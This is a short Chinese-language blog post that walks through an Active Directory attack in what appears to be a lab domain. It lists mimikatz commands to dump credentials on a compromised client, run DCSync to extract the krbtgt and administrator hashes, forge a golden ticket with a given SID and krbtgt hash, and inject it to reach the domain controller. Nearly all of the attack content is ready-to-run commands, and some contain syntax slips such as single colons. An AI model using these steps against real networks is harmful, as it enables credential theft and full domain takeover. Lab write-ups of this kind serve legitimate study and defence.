域渗透之通过DCSync获取权限并制作黄金票据

环境背景


  • 账号:

    • admin 没有域管权限
    • admin02 有域管权限
    • administrator 有域管权限
  • 模拟渗透过程:

利用任意方法已经登录到client1(Windows 7),在client1上获取到了admin02的权限,进行DCSync获取krbtgt的hash,制作黄金票据,并远程IPC访问域控Windows Server 2012


登录Client1抓取域管凭证



尝试dcsync

尝试获取域管权限

尝试在本机上与mimikatz抓取这个组内的成员的hash

privilege::debug
sekurlsa::logonpasswords


切换到admin02执行DCSync

lsadump:dcsync /user:krbtgt /domain:sec.com
lsadump:dcsync /user:administrator /domain:sec.com


制作使用黄金票据


kerberos::golden /user:administrator /domain:sec.com /sid:s-1-5-21-2824519120-46247909-3994855717-500 /krbtgt:251ebdd7727334d9ade0415bf79d255a /ticket:super.ticket
kerberos:ptt super.ticket


posted @ 2019-03-02 23:09  挖洞的土拨鼠  阅读(1316)  评论(0编辑  收藏